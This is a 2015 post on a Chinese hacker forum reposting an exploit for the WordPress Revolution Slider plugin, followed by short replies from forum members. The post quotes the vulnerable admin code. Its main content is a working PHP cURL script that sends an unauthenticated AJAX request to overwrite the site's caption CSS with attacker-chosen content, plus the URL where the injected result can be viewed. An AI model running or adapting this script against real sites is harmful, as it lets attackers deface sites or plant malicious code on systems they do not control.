搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 Wordpress Revolution Slider插件任意上传漏洞
查看: 51265|回复: 57

Wordpress Revolution Slider插件任意上传漏洞

[复制链接]
90_
  • TA的每日心情

    2024-11-13 20:06

    • 签到天数: 1628 天

    [LV.Master]伴坛终老
    发表于 2015-3-29 18:07:24 | 显示全部楼层 |阅读模式
    ######################################################################
    # Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
    # Google Dork: Y0ur Brain
    # Date: 27.03.2015
    # Exploit Author: CrashBandicot (@DosPerl)
    # Vendor HomePage: http://revolution.themepunch.com/
    # Version: old
    # Tested on: Windows
    ######################################################################
    [PHP] 纯文本查看 复制代码
    # Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303.      self::ajaxResponseData($contentCSS);
...
305.    case "update_captions_css":
306.      $arrCaptions = $operations->updateCaptionsContentData($data);
307.      self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));
 
 
# Exploit :
 
<?php
 
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Malicious Code Here</marquee>"
);
  
$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
 
?>
 
 
# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
 
    Wordpress漏洞

    相关帖子
    回复

    使用道具 举报

    浮尘
  • TA的每日心情

    2024-10-23 14:35

    • 签到天数: 917 天

    [LV.10]以坛为家III
    发表于 2015-3-29 19:13:42 | 显示全部楼层
    看不懂这个东西
    回复 支持 反对

    使用道具 举报

    Tesla

    该用户从未签到
    发表于 2015-3-29 22:52:32 | 显示全部楼层
    老大老是整这些高端的东西,我们很看不懂啊,要不出个公开课吧
    回复 支持 反对

    使用道具 举报

    _vae
  • TA的每日心情

    2015-7-28 16:16

    • 签到天数: 1 天

    [LV.1]初来乍到
    发表于 2015-3-30 17:38:00 | 显示全部楼层
    感谢分享
    回复 支持 反对

    使用道具 举报

    testtz
  • TA的每日心情

    2017-1-11 08:26

    • 签到天数: 53 天

    [LV.5]常住居民I
    发表于 2015-3-31 09:01:32 | 显示全部楼层
    这个漏洞国外的比较多
    回复 支持 反对

    使用道具 举报

    jinshengjinshi

    该用户从未签到
    发表于 2015-3-31 22:06:00 | 显示全部楼层
    还得继续学习啊                     
    回复 支持 反对

    使用道具 举报

    cl476874045
  • TA的每日心情
    慵懒
    2019-4-14 17:44

    • 签到天数: 5 天

    [LV.2]偶尔看看I
    发表于 2015-6-27 22:33:59 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    borall

    该用户从未签到
    发表于 2015-6-29 01:58:18 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    Lucifer

    该用户从未签到
    发表于 2015-6-29 04:23:34 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    wtsqq123

    该用户从未签到
    发表于 2015-6-29 21:20:30 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    下一页 »
    123456下一页
    返回列表 发帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 11:29 , Processed in 0.028119 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部